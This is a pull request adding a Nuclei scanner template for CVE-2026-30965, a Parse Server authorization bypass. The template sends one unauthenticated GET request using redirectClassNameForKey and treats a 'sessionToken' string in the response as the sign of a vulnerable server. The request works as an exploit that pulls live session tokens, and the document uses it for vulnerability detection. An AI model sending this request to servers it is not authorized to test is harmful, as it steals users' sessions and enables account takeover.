### PR TITLE
Add CVE-2026-30965 Nuclei template

### DIFF
--- a/http/cves/2026/CVE-2026-30965.yaml
+++ b/http/cves/2026/CVE-2026-30965.yaml
@@ -1,0 +1,46 @@
+id: CVE-2026-30965
+
+info:
+  name: Parse Server redirectClassNameForKey Session Token Exfiltration (CVE-2026-30965)
+  author: str4k3r
+  severity: critical
+  description: >
+    Parse Server versions before 8.6.21 and 9.5.2-alpha.8 failed to re-apply
+    class-level authorization after redirectClassNameForKey changed a query's
+    target class. When a public relation points to _Session, an unauthenticated
+    query could return session records and sessionToken values. This template
+    uses the non-destructive in-band response oracle documented by the upstream
+    security regression test; the target must expose a public relation named
+    pivot from PublicData to _Session.
+  reference:
+    - https://github.com/parse-community/parse-server/security/advisories/GHSA-6r2j-cxgf-495f
+    - https://github.com/parse-community/parse-server/releases/tag/8.6.21
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-30965
+  classification:
+    cve-id: CVE-2026-30965
+    cwe-id: CWE-863
+  metadata:
+    verified: true
+    max-request: 1
+  tags: cve,cve2026,parse-server,authorization-bypass,session-token,unauth
+
+variables:
+  app_id: ""
+  class_name: "PublicData"
+  relation_key: "pivot"
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/parse/classes/{{class_name}}?redirectClassNameForKey={{relation_key}}"
+    headers:
+      X-Parse-Application-Id: "{{app_id}}"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        part: body
+        words:
+          - '"sessionToken"'


### PR DESCRIPTION
Adds a parameterized Nuclei template for CVE-2026-30965. Any required setup, seed, authentication, or callback values are exposed as scan-time variables; no forge-local target address is embedded. Native Nuclei validation passed, and the local ledger records the vulnerable/fixed differential as 3/3 detected versus 3/3 not detected.